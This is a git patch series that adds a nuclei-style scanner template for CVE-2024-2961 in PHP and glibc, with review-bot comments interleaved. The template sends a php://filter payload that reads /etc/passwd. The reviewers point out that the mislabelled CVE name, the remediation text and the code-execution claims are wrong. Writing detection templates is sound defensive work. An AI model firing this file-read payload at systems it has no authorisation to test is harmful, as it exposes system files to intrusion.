From 86bab299827d32bf2756121ff9dd05c4c99a5638 Mon Sep 17 00:00:00 2001
From: DongyoungKim
Date: Thu, 8 Aug 2024 10:41:17 +0900
Subject: [PATCH 1/3] Create CVE-2024-2961.yaml
---
CVE-2024-2961.yaml | 34 ++++++++++++++++++++++++++++++++++
1 file changed, 34 insertions(+)
create mode 100644 CVE-2024-2961.yaml
diff --git a/CVE-2024-2961.yaml b/CVE-2024-2961.yaml
new file mode 100644
index 0000000000..2e969f3bfa
--- /dev/null
+++ b/CVE-2024-2961.yaml
@@ -0,0 +1,34 @@
+hid: CVE-2024-2961
+
+info:
+ name: PHP File Read to Remote Code Execution Through GNU C Library Iconv => CVE-2020-1957
+ author: Kim Dongyoung (Kairos-hk), bolkv, n0ming, RoughBoy0723
+ severity: High
+ description: |
+ If your application has an arbitrary file read vulnerability by allowing a buffer overflow, remote May lead to code execution.
+ impact: |
+ Gain unauthorized access or random access from your PHP application This can be exploited to execute code.
+ remediation: |
+ GNU C Library versions 2.39 and older.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-2961
+ - https://github.com/vulhub/vulhub/tree/master/php/CVE-2024-2961
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
+ cvss-score: 7.3
+ cve-id: CVE-2024-2961
+ tags: cve,cve2024, php, iconv, glibc
+
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}"
+ body: "file=php://filter/read=convert.iconv.UTF-8/ISO-2022-CN-EXT/resource=/etc/passwd"
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+
+ matchers:
+ - type: word
+ words:
+ - "root:x:0:0"
From 73d428ecff5ef22d18b7bd54551e4be5d88f2d07 Mon Sep 17 00:00:00 2001
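Review bot: The matcher `root:x:0:0` only confirms that the `file` parameter reads `/etc/passwd` through `php://filter`, not that the glibc iconv bug is present: `/etc/passwd` is ordinarily plain ASCII, and converting ASCII from UTF-8 to ISO-2022-CN-EXT emits no escape sequences, so a fully patched glibc returns the same bytes and matches just as well. A hit is therefore evidence of an arbitrary file read and only a candidate for CVE-2024-2961 when the target's glibc is 2.39 or older, which the template cannot observe. I would say so in `description`, e.g. `This template only confirms a php://filter file read; CVE-2024-2961 exploitability additionally requires an unpatched glibc (<= 2.39) on the target and must be verified separately`, and move the version text currently under `remediation` into that note, since `GNU C Library versions 2.39 and older.` names the affected versions rather than a fix.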
From: Prince Chaddha
Date: Tue, 8 Oct 2024 16:54:27 +0700
Subject: [PATCH 2/3] Update and rename CVE-2024-2961.yaml to dast/cves/2024/CVE-2024-2961.yaml
---
CVE-2024-2961.yaml | 34 ----------------------
dast/cves/2024/CVE-2024-2961.yaml | 48 +++++++++++++++++++++++++++++++
2 files changed, 48 insertions(+), 34 deletions(-)
delete mode 100644 CVE-2024-2961.yaml
create mode 100644 dast/cves/2024/CVE-2024-2961.yaml
diff --git a/CVE-2024-2961.yaml b/CVE-2024-2961.yaml
deleted file mode 100644
index 2e969f3bfa..0000000000
--- a/CVE-2024-2961.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-hid: CVE-2024-2961
-
-info:
- name: PHP File Read to Remote Code Execution Through GNU C Library Iconv => CVE-2020-1957
- author: Kim Dongyoung (Kairos-hk), bolkv, n0ming, RoughBoy0723
- severity: High
- description: |
- If your application has an arbitrary file read vulnerability by allowing a buffer overflow, remote May lead to code execution.
- impact: |
- Gain unauthorized access or random access from your PHP application This can be exploited to execute code.
- remediation: |
- GNU C Library versions 2.39 and older.
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2024-2961
- - https://github.com/vulhub/vulhub/tree/master/php/CVE-2024-2961
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
- cvss-score: 7.3
- cve-id: CVE-2024-2961
- tags: cve,cve2024, php, iconv, glibc
-
-
-requests:
- - method: POST
- path:
- - "{{BaseURL}}"
- body: "file=php://filter/read=convert.iconv.UTF-8/ISO-2022-CN-EXT/resource=/etc/passwd"
- headers:
- Content-Type: application/x-www-form-urlencoded
-
- matchers:
- - type: word
- words:
- - "root:x:0:0"
diff --git a/dast/cves/2024/CVE-2024-2961.yaml b/dast/cves/2024/CVE-2024-2961.yaml
new file mode 100644
index 0000000000..b9b9c4320a
--- /dev/null
+++ b/dast/cves/2024/CVE-2024-2961.yaml
@@ -0,0 +1,48 @@
+id: CVE-2024-2961
+
+info:
+ name: PHP - LFR to Remote Code Execution
+ author: Kim Dongyoung (Kairos-hk),bolkv,n0ming,RoughBoy0723
+ severity: high
+ description: |
+ PHP Local File Read vulnerability leading to Remote Code Execution
+ impact: |
+ Remote attackers can execute arbitrary code on the server
+ remediation: |
+ Update PHP to the latest version and sanitize user input to prevent LFR attacks
+ reference:
+ - https://github.com/vulhub/vulhub/tree/master/php/CVE-2024-2961
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-2961
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
+ cvss-score: 7.3
+ cve-id: CVE-2024-2961
+ cwe-id: CWE-787
+ epss-score: 0.00046
+ epss-percentile: 0.17835
+ tags: cve,cve2024,php,iconv,glibc,lfr,rce
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+ - 'method == "POST"'
+ condition: and
+
+ payloads:
+ phppayload:
+ - "php://filter/read=convert.iconv.UTF-8/ISO-2022-CN-EXT/resource=/etc/passwd"
+
+ stop-at-first-match: true
+ fuzzing:
+ - part: query
+ type: postfix
+ mode: single
+ fuzz:
+ - "{{phppayload}}"
+
+ matchers:
+ - type: regex
+ regex:
+ - "root:x:0:0"
From 46b3f671de1856a01bc32a8f64ebe07336e99aac Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 18 Oct 2024 17:22:33 +0530
Subject: [PATCH 3/3] updated req and added flow
---
dast/cves/2024/CVE-2024-2961.yaml | 19 +++++++++++++++----
1 file changed, 15 insertions(+), 4 deletions(-)
diff --git a/dast/cves/2024/CVE-2024-2961.yaml b/dast/cves/2024/CVE-2024-2961.yaml
index b9b9c4320a..f16493fb0f 100644
--- a/dast/cves/2024/CVE-2024-2961.yaml
+++ b/dast/cves/2024/CVE-2024-2961.yaml
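Review bot: `remediation` tells operators to update PHP, but the overflow behind this CVE lives in glibc's iconv (both the `glibc` tag and the NVD reference point there), so a PHP upgrade alone leaves a host exploitable; I would replace that line with `Update glibc to a build containing the fix for CVE-2024-2961 (2.40, or a distribution backport), and never pass user-controlled paths or stream wrappers to file functions`. The `description`, `impact` and the `rce` tag also promise remote code execution, while the only thing the template observes is `root:x:0:0` coming back from a `php://filter` read of `/etc/passwd`, which an ASCII file survives unchanged on patched glibc too; the metadata should say the template detects the file-read primitive and that code execution depends on an unpatched target, which it cannot verify. A one-line note under `description` such as `Detects the php://filter file read used by the CVE-2024-2961 chain; the glibc overflow itself is not triggered` would set the right expectation for triage.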
@@ -19,16 +19,27 @@ info: cve-id: CVE-2024-2961 cwe-id: CWE-787 epss-score: 0.00046 - epss-percentile: 0.17835 - tags: cve,cve2024,php,iconv,glibc,lfr,rce + epss-percentile: 0.17937 + tags: cve,cve2024,php,iconv,glibc,lfr,rce,dast + +flow: http(1) && http(2) http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - '!regex("root:x:0:0", body)' + internal: true + - pre-condition: - type: dsl dsl: - 'method == "GET"' - 'method == "POST"' - condition: and payloads: phppayload: @@ -37,7 +48,7 @@ http: stop-at-first-match: true fuzzing: - part: query - type: postfix + type: replace mode: single fuzz: - "{{phppayload}}"
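Review bot: Dropping `condition: and` from `pre-condition` is what makes the template runnable at all, since `method == "GET"` and `method == "POST"` can never both hold for one request, but nothing in the hunk records that the two DSL entries are now meant as alternatives, which only works because nuclei falls back to OR when no condition is given (as far as I can tell from its matcher defaults). I would add `# either verb qualifies; DSL entries are OR-ed when no condition is set` above the `dsl:` list. The new `http(1)` baseline with `!regex("root:x:0:0", body)` is a sound guard against pages that already print that string, though it samples `{{BaseURL}}` with no parameters, so a page that renders it only when a parameter is present still passes the gate; worth a short comment on the `flow:` line so the intent survives the next edit.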
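Review bot: The fuzzing block still targets only `part: query`, so a POST form body, which the `pre-condition` above explicitly admits via `method == "POST"`, is never mutated, and a `file=` parameter sent in the body (the case the original request-based template covered) is missed. Switching to `type: replace` is right, since `postfix` would have appended the wrapper to the existing value and produced an invalid path, but the same rule should be duplicated for the body part. The `http` entry this hunk belongs to starts outside the hunk.
```yaml
fuzzing:
  # … unchanged: query part (type: replace, mode: single, fuzz: {{phppayload}}) …
  - part: body
    type: replace
    mode: single
    fuzz:
      - "{{phppayload}}"
```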